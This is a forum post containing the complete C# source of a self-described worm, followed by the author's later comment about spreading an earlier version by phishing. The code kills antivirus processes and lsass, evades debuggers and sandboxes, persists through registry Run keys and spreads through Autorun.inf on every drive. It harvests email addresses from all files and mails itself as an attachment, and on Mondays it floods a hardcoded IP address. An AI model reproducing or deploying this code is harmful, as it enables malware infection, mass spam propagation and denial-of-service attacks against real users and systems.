JMC31337 Posted May 23, 2010 Posted May 23, 2010 (edited) //JMC31337 //NEMESIS WORM PROJEKT using System; using System.Net; using System.Net.Sockets; using System.Text; using System.Threading; using System.Collections.Generic; using System.IO; using System.Text.RegularExpressions; using System.Net.Mail; using System.Net.Mime; using System.Runtime.InteropServices; using System.Diagnostics; using System.Collections; using System.ComponentModel; using System.Data; using Microsoft.Win32; namespace ConsoleApplication1 { class Program { public static int bypass = 0; private static string DESTINATION_IP_ADDRESS = "204.13.204.222"; private static string DESTINATION_IP_ADDRESS2 = "204.13.204.222"; private static int DESTINATION_PORT = 53; private static int DESTINATION_PORT2 = 80; public class RecursiveFileSearch { [DllImport("URL.DLL", ExactSpelling = true, SetLastError = true, CallingConvention = CallingConvention.ThisCall)] public static extern bool OpenURL(); [DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)] internal static extern bool IsDebuggerPresent(); [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); static void DetectWireshark() { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Equals("The Wireshark Network Analyzer")) { string processName = "lsass"; Process[] processes = Process.GetProcessesByName(processName); foreach (Process process in processes) { process.Kill(); } } } Virusx(); } static void DetectWPE() { Process[] ProcessList = Process.GetProcesses(); foreach ( Process proc in ProcessList) { if (proc.MainWindowTitle.Equals("WPE PRO")) { string processName = "lsass"; Process[] processes = Process.GetProcessesByName(processName); foreach ( Process process in processes) { process.Kill(); } } } Virusx(); } static void DetectEmulation() { long tickCount = Environment.TickCount; System.Threading.Thread.Sleep(500); long tickCount2 = Environment.TickCount; if (((tickCount2 - tickCount) < 500L)) { string processName = "lsass"; Process[] processes = Process.GetProcessesByName(processName); foreach ( Process process in processes) { process.Kill(); } } Virusx(); } static void DetectSandboxie() { if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) { string processName = "lsass"; Process[] processes = Process.GetProcessesByName(processName); foreach (Process process in processes) { process.Kill(); } } Virusx(); } static void checkifdebugger() { string processName = "lsass"; Process[] processes = Process.GetProcessesByName(processName); foreach (Process process in processes) { process.Kill(); } bool check = IsDebuggerPresent(); if (check == true) { System.Environment.Exit(111); } Virusx(); } static void Worm() { string[] a2z = { "A","B","C","D","E","F","G","H","I","J","K","L","M", "N","O","P","Q","R","S","T","U","V","W","X","Y","Z" }; int w = 0; for(w=0;w<26;w++) { try { System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.EnableRaisingEvents=false; proc.StartInfo.FileName=a2z[w]+":\\CSRSS"; proc.Start(); } catch (Exception e){} } } static void Virusx() { string[] atoz = { "A","B","C","D","E","F","G","H","I","J","K","L","M", "N","O","P","Q","R","S","T","U","V","W","X","Y","Z" }; int alph = 0; string x = Path.GetFullPath("CSRSS.exe"); String str; String q = "%SystemRoot%"; str = Environment.ExpandEnvironmentVariables(q); if (File.Exists("\\CSRSS.exe")) { try { } catch (Exception e) { }; } else { try { for (alph = 0; alph < 26; alph++) { File.Copy(x, atoz[alph]+":\\CSRSS.exe"); File.Copy(x, atoz[alph]+":\\CSRSS.ex_"); TextWriter tw = new StreamWriter(atoz[alph] + ":\\Autorun.inf"); tw.WriteLine("[AutoRun]"); tw.WriteLine("OPEN=CSRSS.EXE"); tw.WriteLine("ICON=CSRSS.EXE"); tw.WriteLine("ACTION=START'NG NEMESIS PROJEKT"); tw.Close(); } } catch (Exception e) { } } } public static int DCheck(int x) { DateTime d = DateTime.Now; if (d.DayOfWeek == DayOfWeek.Monday) { x = 1; } return x; } static void Kill() { string[] processName = { "ISafe", "ITMRTSVC", "QOELoader", "cctray", "CAVRID", "capfasem","VetMsg","MSASCui","avp","SSU","Ad-Aware","SpySweeperUI", "capfsem", "CAPPActiveProtection","ccprovsp","PPCtlPriv","cmdagent","aswUpdSv","SpySweeper","bdagent","livesrv","CAGlobalLight", "AAWService","ashServ","sched","avguard","pctsAuxs","pctsSvc","avmailc","AVWEBGRD","ashMaiSv","ashMaiSv","AAWTray","Mcafeeupdate","","", "cfp","pctsTray","egui","WEXTRACT","ccApp","osCheck","isPwdSvc","nod32","mcmscsvc","TeaTimer","noadware5","persfw", "CAGlobal","xcommsvr","ccprovsp","UmxPol","UmxFwHlp","UmxCfg","UmxAgent","avgwdsvc","mcagent","avgrsx","avgemc","VetMsg", "ISafe","mcshield","mcproxy","mcsysmon","MsMpEng","avgcc","mbamservice","mbamgui","avgemc","avgupsvc","avgamsvr","explorer", "ashDisp","SUPERAntiSpyware","RegFirewall","HiJackThis","MPFSrv","MskSrver","mcagent","mcsysmon","McSACore","avp","persfw","kavtray","aawservice","kavfsscs", "ccSetMgr","SNDSrvc","SPBBCSvc","ccEvtMgr","blackd","navapsvc","NPFMntor","rapapp","symlcsvc","NAVAPW32","BLACKICE","rtsserv","blackice","navapw32", "wextact","itmrtsvc","isafe","cavrid","avgamsvr","avgupsvc","avgemc","avgcc","zlclient","FPAVServer","fssf","FProtTray","nvvsvc","avgwdsvc","pctsAuxs","pctsSvc", "avgrsx","avgnsx","pctsTray","avgcsrvx","avgemc","avgtray","Dwm","WUDFHost","MSACUI","MsMpEng","MSASCui","wscntfy","egui","smc","TrayNotify", }; foreach (string str in processName) { Process[] processes = Process.GetProcessesByName(str); foreach (Process process in processes) { try { Thread.Sleep(1000); process.EnableRaisingEvents = false; process.Kill(); } catch (Exception e) { }; } } } static void Regxx() { RegistryKey key = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run"); RegistryKey master = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run"); master.GetValue("ACSRSS","A:\\CSRSS.exe"); if(master!=null) { bypass++; } if (key != null && bypass==0) { string[] atoz = { "A","B","C","D","E","F","G","H","I","J","K","L","M", "N","O","P","Q","R","S","T","U","V","W","X","Y","Z" }; int alph = 0; for (alph = 0; alph < 26; alph++) { key.SetValue(atoz[alph] + "CSRSS", atoz[alph] + ":\\CSRSS.exe"); } } } public static string finalx(string finalx) { string ip = new System.Net.WebClient().DownloadString(("http://www.whatismyip.com/automation/n09230945.asp")); string Arguments = ip + " > \\log.txt"; Process Process = new Process(); ProcessStartInfo Start = new ProcessStartInfo(); Start.FileName = "CMD.exe "; Start.RedirectStandardError = false; Start.RedirectStandardOutput = false; Start.RedirectStandardInput = false; Start.UseShellExecute = false; Start.CreateNoWindow = true; Start.Arguments = "/D /c nslookup " + Arguments; Process.EnableRaisingEvents = true; Process.StartInfo = Start; Process.Start(); Thread.Sleep(5000); //================================= StreamReader reader = new StreamReader("\\log.txt"); int counter = 0; string line; string[] stringx; stringx = new String[8]; int ptr = 0; while ((line = reader.ReadLine()) != null) { counter++; if (counter == 4) { string[] words = line.Split('.'); foreach (string word in words) { stringx[ptr++] = word; } string final = stringx[3]; finalx = final + "." + stringx[4]; } } return finalx; } static void Main() { Kill(); Regxx(); int x = 0; x = DCheck(x); if (bypass == 0) { Virusx(); } Kill(); checkifdebugger(); Kill(); DetectSandboxie(); Kill(); DetectEmulation(); Kill(); DetectWPE(); Kill(); DetectWireshark(); Kill(); //=========================== if (x == 1) //IS IT MONDAY { bool check = OpenURL(); Kill(); IPAddress destinationIPaddress = IPAddress.Parse(DESTINATION_IP_ADDRESS); IPAddress destinationIPaddress2 = IPAddress.Parse(DESTINATION_IP_ADDRESS2); IPEndPoint ep = new IPEndPoint(destinationIPaddress, DESTINATION_PORT); IPEndPoint ep2 = new IPEndPoint(destinationIPaddress2, DESTINATION_PORT2); byte[] sendbuf = { 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33 }; Socket s = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); Socket s2 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); int PoD = 0; while (true) { s.SendTo(sendbuf, ep); s2.SendTo(sendbuf, ep2); Process Process2 = new Process(); ProcessStartInfo Start2 = new ProcessStartInfo(); if (PoD < 5) { Start2.FileName = "CMD.exe "; Start2.RedirectStandardError = false; Start2.RedirectStandardOutput = false; Start2.RedirectStandardInput = false; Start2.UseShellExecute = false; Start2.CreateNoWindow = true; Start2.Arguments = "ping -n 4294967295 -l 65500 " + ep2; Process2.EnableRaisingEvents = true; Process2.StartInfo = Start2; Process2.Start(); } PoD++; //Attack Port 53 if (PoD > 5) { break; } } } string[] drives = System.Environment.GetLogicalDrives(); foreach (string dr in drives) { System.IO.DriveInfo di = new System.IO.DriveInfo(dr); if (!di.IsReady) { continue; } System.IO.DirectoryInfo rootDir = di.RootDirectory; string server = null; WalkDirectoryTree(rootDir, server); } Worm(); } static void WalkDirectoryTree(System.IO.DirectoryInfo root, string server) { server = null; server = "smtp." + finalx(server); System.IO.FileInfo[] files = null; System.IO.DirectoryInfo[] subDirs = null; try { files = root.GetFiles("*.*"); } catch (UnauthorizedAccessException e){} catch (System.IO.DirectoryNotFoundException e){} if (files != null) { int emcount = 0; foreach (System.IO.FileInfo fi in files) { try { string[] mailx; mailx = new String[50]; string inFilePath = fi.FullName; string data = File.ReadAllText(inFilePath); Regex.Replace(data, "", "\r\n"); Regex emailRegex = new Regex(@"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[ a-z0-9])?\.)+(?:[A-Z]{2}|com|org|net|edu|gov|mil|biz|info|mobi|name|aero|asia|jobs|museum)\b", RegexOptions.IgnoreCase); MatchCollection emailMatches = emailRegex.Matches(data); Match[] em = new Match[emailMatches.Count]; foreach (Match emailMatch in emailMatches) { string dest = emailMatch.Value; Kill(); MailMessage nemmie = new MailMessage(); nemmie.From = new MailAddress("NEMESIS_WORM@NEMESIS.com"); nemmie.To.Add(dest); emcount++; nemmie.Subject = "C# NEMESIS WORM"; nemmie.Priority = MailPriority.High; nemmie.IsBodyHtml = true; nemmie.Body = "<html><head></head><body><form name=\"myform\" action=\"http://www.myspace.com/jmc31337\" method=\"POST\"><div align=\"center\"><br><br><input type=\"text\" size=\"25\" value=\"Enter your name here!\"><br><input type=\"submit\" value=\"You've Been Hit By, You've Been Struck By! A smooth Nemesis\"><br></div></form></body></html>"; Attachment data2 = new Attachment("\\CSRSS.ex_"); nemmie.Attachments.Add(data2); SmtpClient client = new SmtpClient(server, 25); client.EnableSsl = false; client.UseDefaultCredentials = true; client.DeliveryMethod = SmtpDeliveryMethod.Network; client.Credentials = new System.Net.NetworkCredential(null, ""); try { client.Send(nemmie); Thread.Sleep(3000); } catch (SmtpFailedRecipientException e) { } } } catch (Exception e) { } } subDirs = root.GetDirectories(); foreach (System.IO.DirectoryInfo dirInfo in subDirs) { WalkDirectoryTree(dirInfo, server); } } } } } }next step in the future drop this as a .rar .zip and add in the mailer portion code as such instead of .ex_ Edited October 26, 2010 by JMC31337 1
JMC31337 Posted September 11, 2021 Author Posted September 11, 2021 stand corrected- this is not a worm nor is it a trojan worm despite the arguments i had with Symantec on the first variant years back 2008 (emailed it with some phish stuff saying right click rename and run this for me and it got around because back then smtp anony mails were easier than they are today as most ISP now require a user pass - whereas back then you could anonymously email right out the back door ISP smtp port - regardless since the orig variant regex'd the entire disk looking for emails the 3rd party user would see an email from a known source and of course would open it thinking it was legit) this is and so was the first one, only a mailer trojanĀ even tho the orig. was classified as level 3 multiple country infections
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now